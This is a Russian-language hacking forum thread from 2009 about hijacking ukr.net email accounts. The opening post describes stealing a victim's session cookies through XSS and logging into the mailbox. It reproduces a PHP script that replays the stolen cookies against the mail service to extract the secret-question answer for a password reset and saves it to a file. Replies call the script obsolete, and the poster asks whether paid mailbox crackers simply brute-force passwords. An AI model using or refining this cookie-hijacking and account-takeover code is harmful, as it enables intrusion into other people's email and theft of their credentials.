ukrNet: поиметь пароль

Discussion in 'Уязвимости Mail-сервисов' started by firemen, 22 Apr 2009.

  1. firemen

    firemen New Member

    Joined:
    3 Jun 2006
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    через XSS имею куки.
    захожу на ящик жертвы нормально.

    не нашел, за что бы зацепиться поменять пароль, не зная текущего...

    в востановлении пароля используется секретный вопрос.

    погуглив, нашел старенький скрипт, позволяющий имея куки выдрать ответ на секретный вопрос, правда работу его немного не понял )

    вот он:

    PHP:
    <?
    $query=$_SERVER["QUERY_STRING"];
    $query=urldecode($query);
    $header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0rn"
    $header.="Referer: http://e.ukr.netrn";
    $header.="Cookie: ".$query."rn";
    $header.="Host: e.ukr.netrnrn";
    $fp=fsockopen("e.ukr.net"80); 
    fwrite($fp$header); 
    $dt=""
    while (!
    feof($fp)) 
    $dt.=fread($fp1024); 
    // выдираем из полученной страницы ответ на секретный вопрос
    $answ1=strpos($dt,'Password_Answer')+24
    $answ2=strpos($dt,'" size="40">'); 
    $length_answ=$answ2-$answ1
    $full_answer=substr($dt,$answ1,$length_answ); 
    // сохраняем полученный ответ на вопрос в файл: answer.html
    $fp1=Fopen("answer.html","a"); 
    fwrite($fp1,"$full_answer"); 
    fclose($fp1); 
    fclose($fp); 
    ?>
    грамотные люди, подскажите есть ли рабочий скрипт такого плана или идеи по смене пароля..

    удачи!
     
  2. lmns

    lmns Elder - Старейшина

    Joined:
    21 Feb 2007
    Messages:
    195
    Likes Received:
    111
    Reputations:
    8
    нет.
    Возможно когда-то давно ответ на секретный вопрос можно было узнать просто попав в ящик, или сняв куки.
    Данная строчка
    обращение к данной странице, при помощи авторизации через куки.
     
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Скрипт этот вообще древнейший. Какие-то стрпос... Все делается(лось) регулярками!
     
    1 person likes this.
  4. firemen

    firemen New Member

    Joined:
    3 Jun 2006
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    lmns не знал, что секретный вопрос лежал открыто раньше )

    так что, значит не судьба поиметь пароль?

    а народ, что за бабки ящики ломает, брутят что ли только?